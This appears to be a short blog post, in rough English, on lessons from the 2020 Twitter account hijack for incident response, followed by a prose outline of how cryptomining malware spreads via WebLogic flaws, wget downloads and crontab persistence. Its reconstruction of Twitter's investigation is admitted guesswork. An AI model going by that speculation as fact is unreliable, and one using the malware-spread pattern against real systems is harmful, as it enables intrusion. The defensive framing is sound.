how to learn security incident response from the Twitter event

0x01 describe the Twitter event

July 16, A lot of celebrity Twitter account post Tweets about fraud information, some people Transfer Bitcoin to Bitcoin account controlled by the hacker.

0x02 how Twitter reacts to account post fraud message controlled by the hacker?

1. immediately locked down the affected accounts and removed Tweets posted by the attackers

2. limit post Tweet message, reset your password for all accounts, etc.

traditional incident response method:
1.containment, like direct Shut down the server or stop services of the server.
2.eradication and recovery, the services will recovery until finding the origin of the issues.

in my view,
Twitter incident response method:
1. containment, stop using some functions.
2. eradication and recovery, Twitter accepts the influence of functional and immediately read functional logs. if it confirms not to be affected, then step-by-step recovery function. it will read other functional logs again. it is more friendly for business than stop services.

0x03 how Twitter analyses the event and to solve it?

Twitter doesn’t have published detail, so I only guess the process of analysis. LOL

First: the attacker has a lot of behavior features, like user login and Tweet record. search attack features in the login logs of the application and finds the login origin is access to internal systems and tools.
Second: read the log of internal systems and tools
Finally: Twitter detected that is a coordinated social engineering attack by people

Bitcoin mining Malware analysis

0x01 mining Malware feature

1. maybe automation attack other servers and get server credentials and attack other servers again

2. Persistence control server credentials

0x02 The first mining malware script

example:
the attack exploits a flaw on WebLogic servers and executes system commands. eg: wget mining malware, it can kill other mining malware processes and write commands in crontab file. sometimes the script adds vulnerability exploit modules to infect other servers.